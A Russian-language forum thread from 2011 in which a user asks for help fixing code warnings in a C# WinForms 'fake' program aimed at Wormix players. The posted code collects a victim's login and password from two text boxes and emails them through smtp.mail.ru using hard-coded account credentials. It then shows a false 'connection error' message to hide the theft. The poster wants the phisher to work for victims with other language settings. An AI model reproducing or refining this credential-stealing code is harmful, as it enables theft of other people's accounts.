PDA

Просмотр полной версии : [Помогите!] Ошибка с IFormatProvider и MessageBoxOptions


bohdan09
19.04.2011, 15:10
Как испаравить в коде траблу с IFormatProvider и MessageBoxOptions?

В конце кода видно что я указал MessageBoxOptions, но ошибка всеровно не пропадает, но то неоч важно. Более критичекое значение имеет ошибка IFormatProvider, если в другого пользователя стоит другой язык и региональные параметры(что можо настроить в ПУ), то в его фейк не пойдет. Вооще не пойму как вписать код IFormatProvider в мой.
Может кому знакома программа Microsoft FxCop 1.36. После того как Вы создали приложение проганяете его через ету прогу. Она видит другие ошибки которые студия видит как предупреждения и дает ссылки на МСД по решению той или инной ошибки в коде. Кому нужнен, вот ([Ссылки могут видеть только зарегистрированные и активированные пользователи]) видеоурок по использованию. Как Вы догадались я через нее нашел ошибки.


using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Text;
using System.Windows.Forms;
using System.Net;
using System.Net.Mail;
using System.Globalization;

[assembly: CLSCompliant(false)]
namespace Feik1
{
public partial class Form1 : Form
{
public Form1()
{
InitializeComponent();
}


private void button1_Click(object sender, EventArgs e)
{


SmtpClient client = new SmtpClient("smtp.mail.ru", 2525);

client.Credentials = new System.Net.NetworkCredential("[Ссылки могут видеть только зарегистрированные и активированные пользователи]", "h98576hg8r");
string msgFrom = "[Ссылки могут видеть только зарегистрированные и активированные пользователи]";
string msgTo = "[Ссылки могут видеть только зарегистрированные и активированные пользователи]";
string msgSubject = "Wormix Lammer";
string msgBody = String.Format("\nЛогин: {1}\nПароль: {2}",ToString(), textBox1.Text, textBox2.Text);

MailMessage msg = new MailMessage(msgFrom, msgTo, msgSubject, msgBody);

try
{
client.Send(msg);
}
catch (Exception ex)
{
MessageBox.Show(ex.Message);
throw;
}
MessageBox.Show("Ошибка соединения с сервером,\nпроверьте параметры подключения", "Ошибка", MessageBoxButtons.OK, MessageBoxIcon.Asterisk, MessageBoxDefaultButton.Button1, MessageBoxOptions.DefaultDesktopOnly);
Close();
}
}
}

bohdan09
20.04.2011, 03:28
на win7 траблы с отправкой почты.также проблема может быть из-за русского имени компа
Я думаю что второе, ты незнаешь как записать класс CultureInfo в моем коде?

Обновил первый пост

Cherinho
20.04.2011, 13:14
Ну добавь класс новый в свой проект,а потом в своем коде обращайся к нему